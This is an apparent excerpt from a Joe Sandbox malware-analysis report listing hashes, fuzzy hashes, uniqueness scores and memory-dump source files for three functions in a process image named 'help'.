• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: c34f90f43d67a947e11ebb68a16ffcec33cd378617268e50f2f60b1a1faf13c9
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 6A91A4B4E0021A9BDF24DF69CCC16BEB7A5FF46720F18C61AE865EB2D0D73499418B50
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 9c70b3a0cb768d9cd1a9f3836f855738cdfd1600e4be173ed3a8448e81f01e08
• Instruction ID: 83bf65b7bdace252110273ad936efd6269393044cacc470a01ed939adcc6a22a
• Opcode Fuzzy Hash: 9c70b3a0cb768d9cd1a9f3836f855738cdfd1600e4be173ed3a8448e81f01e08
• Instruction Fuzzy Hash: 3C811975D112699BDB35DF54CC84BEEB7B8AB08710F0445EAEA19B7280D7709E84CFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 0337CFBD
Memory Dump Source
• Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
• Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32c0000_help.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• API String ID: 4062629308-2383119779
• Opcode ID: eac54be3ed0d380dc70b807ff7c1ea5a87e70484102b406c54bef10bdbb8bc91
• Instruction ID: f9ce3d01b8373f8a330010d0d3bfa14ce580f477af76411e170599db56ccd3a4
• Opcode Fuzzy Hash: eac54be3ed0d380dc70b807ff7c1ea5a87e70484102b406c54bef10bdbb8bc91
• Instruction Fuzzy Hash: 94415EB5D00224DFCB21DF99C8C0AAEBBB8EF45B10F04452AE955DF294D778D941CB61
Uniqueness
• Uniqueness Score: -1.00%